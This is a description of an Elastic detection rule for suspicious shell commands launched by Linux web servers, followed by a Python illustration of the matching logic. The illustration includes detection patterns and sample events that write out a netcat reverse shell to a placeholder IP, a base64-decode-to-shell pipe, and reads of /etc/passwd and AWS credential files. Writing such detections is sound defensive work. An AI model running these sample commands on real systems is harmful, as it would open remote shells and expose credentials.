Suspicious Command Execution via Web Server

Elastic Detection Rules

Summary
This rule detects suspicious command execution initiated by a web server on Linux endpoints, indicating potential vulnerability exploitation, web shell activity, or backdoor persistence. It fires when a web server process on a Linux host starts a shell to run commands that resemble exploitation activity (discovery, credential access, payload decoding, or reverse shell setup). The detection concentrates on web server processes and their common parents (nginx, apache2, httpd, php-fpm, Java-based servers, etc.) launching shells (bash, sh, dash, tcsh, csh, zsh, etc.) with interpreter invocations such as -c, -cl, or -lc.

The rule's command_line coverage captures patterns typical of abuse: working directories such as /tmp, /var/tmp, /dev/shm, and /run; encoding/decoding and piping techniques; credential and key discovery; AWS/Azure/GCP credential exposure and AWS config files; discovery of system and network information; reverse shells via netcat/socat/openssl; file and cron manipulation; and invocations of common web-application runtimes (PHP, Python, Ruby, Java). It also enforces a guardrail to reduce false positives by excluding known legitimate administrative tasks and expected maintenance workflows.

The accompanying triage guidance emphasizes reconstructing the execution chain (process ancestry, environment, and the requesting user/request context), correlating with web server access, error, and application logs, inspecting the web root and writable directories for dropped scripts or payloads, and isolating and remediating compromised hosts or vulnerable applications once unauthorized activity is confirmed. The rule is aligned with the MITRE ATT&CK techniques Web Shell (T1505.003), Exploit Public-Facing Application (T1190), and Command and Scripting Interpreter (T1059).
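To make the shape of this detection concrete, here is an added illustration (not the Elastic rule's own query) of the three-part match the summary describes: a web server parent, a shell child invoked with -c/-cl/-lc, and a command line hitting one of the abuse patterns, with a constructed allowlist standing in for the false-positive guardrail. The parent/shell sets, regexes, allowlist entries, and sample events are all constructed for the example.

```python
import re

# Constructed illustration of the detection's shape; not the Elastic rule's own query.
WEB_SERVER_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "java", "tomcat"}
SHELLS = {"bash", "sh", "dash", "tcsh", "csh", "zsh"}
INTERPRETER_FLAGS = {"-c", "-cl", "-lc"}

# Command-line patterns grouped by the behaviour they suggest (constructed, simplified).
SUSPICIOUS_PATTERNS = {
    "writable_dir": re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm|/run)(/|\s|$)"),
    "decode_pipe": re.compile(r"base64\s+(-d|--decode)|\|\s*(sh|bash)\b"),
    "credential_access": re.compile(r"/etc/(passwd|shadow)|\.aws/credentials|id_rsa"),
    "reverse_shell": re.compile(r"\b(nc|ncat|netcat|socat|openssl)\b.*\d+\.\d+\.\d+\.\d+"),
    "cron_tamper": re.compile(r"\bcrontab\b|/etc/cron"),
}

# Constructed guardrail: maintenance commands an operator has already vetted.
ALLOWLIST = (re.compile(r"^logrotate\b"), re.compile(r"^/usr/local/bin/healthcheck\.sh\b"))


def classify(event):
    """Return the matched behaviour labels for one process event ([] means no alert)."""
    if event["parent"] not in WEB_SERVER_PARENTS or event["process"] not in SHELLS:
        return []
    args = event["args"]
    # Require an interpreter invocation such as `sh -c "<command>"`.
    if len(args) < 3 or args[1] not in INTERPRETER_FLAGS:
        return []
    cmd = " ".join(args[2:]).strip()
    if any(p.search(cmd) for p in ALLOWLIST):
        return []
    return [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmd)]


def scan(events):
    """Map event id -> matched labels for every event that should alert."""
    return {e["id"]: hits for e in events if (hits := classify(e))}


# Constructed sample process events (parent name, process name, argv).
SAMPLE_EVENTS = [
    {"id": 1, "parent": "php-fpm", "process": "sh",
     "args": ["sh", "-c", "cd /tmp && echo d2hvYW1p | base64 -d | sh"]},
    {"id": 2, "parent": "nginx", "process": "bash",
     "args": ["bash", "-c", "nc 203.0.113.10 4444 -e /bin/sh"]},
    {"id": 3, "parent": "java", "process": "sh",
     "args": ["sh", "-c", "cat /etc/passwd; cat ~/.aws/credentials"]},
    {"id": 4, "parent": "apache2", "process": "sh",
     "args": ["sh", "-c", "logrotate /etc/logrotate.d/apache2"]},  # vetted maintenance task
    {"id": 5, "parent": "sshd", "process": "bash",
     "args": ["bash", "-c", "cat /etc/shadow"]},  # admin session, parent is not a web server
]
```

Running `scan(SAMPLE_EVENTS)` alerts on events 1 to 3 only: the logrotate run is suppressed by the allowlist and the sshd-spawned shell never reaches the pattern check, which is the same ancestry-first filtering the triage guidance relies on.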
Categories
  • Endpoint
  • Linux
Data Sources
  • Process
  • Command
ATT&CK Techniques
  • T1505
  • T1505.003
  • T1190
  • T1059
Created: 2026-06-01